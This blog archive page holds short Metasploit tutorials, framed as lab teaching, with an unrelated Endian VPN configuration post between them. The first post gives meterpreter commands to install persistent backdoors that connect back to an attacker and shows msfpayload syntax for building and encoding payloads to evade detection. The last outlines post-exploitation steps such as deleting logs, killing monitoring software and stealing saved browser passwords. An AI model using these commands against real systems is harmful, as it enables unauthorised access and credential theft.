Posts

Showing posts from June, 2011

Metasploit Backdoor Tutorial

Image
Backdoor:
Create persistence backdoor
Can be configured to connect back on systemboot or user login
Time can be set between connect back attemps
Under the hood
    Create vbs file on the victim and excute it
    Add registry entries so it is autorun
Can be uninstalled remotely
    Vbs file delete manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10

Metsvc backdoor
Run as service on the victim
Connect to it remotely
    No authentication required
Can be remotely unintalled
    File need delete manually
Less noisy compared to persistence
    Attacker can connect when he wants
Can be found by portscaning
Demo: Backdoor with Metsvc



Create Executable from payloads
Msfpayload
Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar;
Ex:
msfpayload windows/meterprete/bind_tcp RHOST=192.168.1.100 X | bind_tcp.exe
Encoding to obfucate payload
Encode payload to eavde detection
Encode payloa…

Endian- VPN client to site (Host to network)

Image
One friend ask me about it. I recognize many company in Vietnam like using Endian. But flow me, i like Vyatta more, because i like denial using routing. :))
That is simple to config it, if you had some experience about openvpn. Endian use openvpn for vpnserver.
And you will notice about client config, there are:
dev tap : for DHCP service
ca endian.pem : ca cert, not use client cert like ipcop
remote endian IP or hostname : of coure
auth-user-pass : user and password which were created.

Demo:




or: http://www.mediafire.com/?2qdhttek586be81
------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Metasploit, stealing data, get saved password and sniffing password

Image
My friend asked me: what will you do after exploit. So i answered: privilege escalation, or stealing data. I have some advices for : Phases of Post-exploitation
1. Understanding the Victim better
2. Privilege Escalation
3. Deleting Log and Kill Monitoring software
4. Collecting Data, excuting Programs
    Search for a file
    Download files
    Download resgistry
    Download application data
        Outlook
        Browser password/sessions
        ...etc
5. Backdoors and Rootkits
6. Using victim as Pirvot to hack deeper into the network 
I maded one video demo it: Using metasploit to stealing data and get firefox saved password:


<p><p><p> </p></p></p>


Next…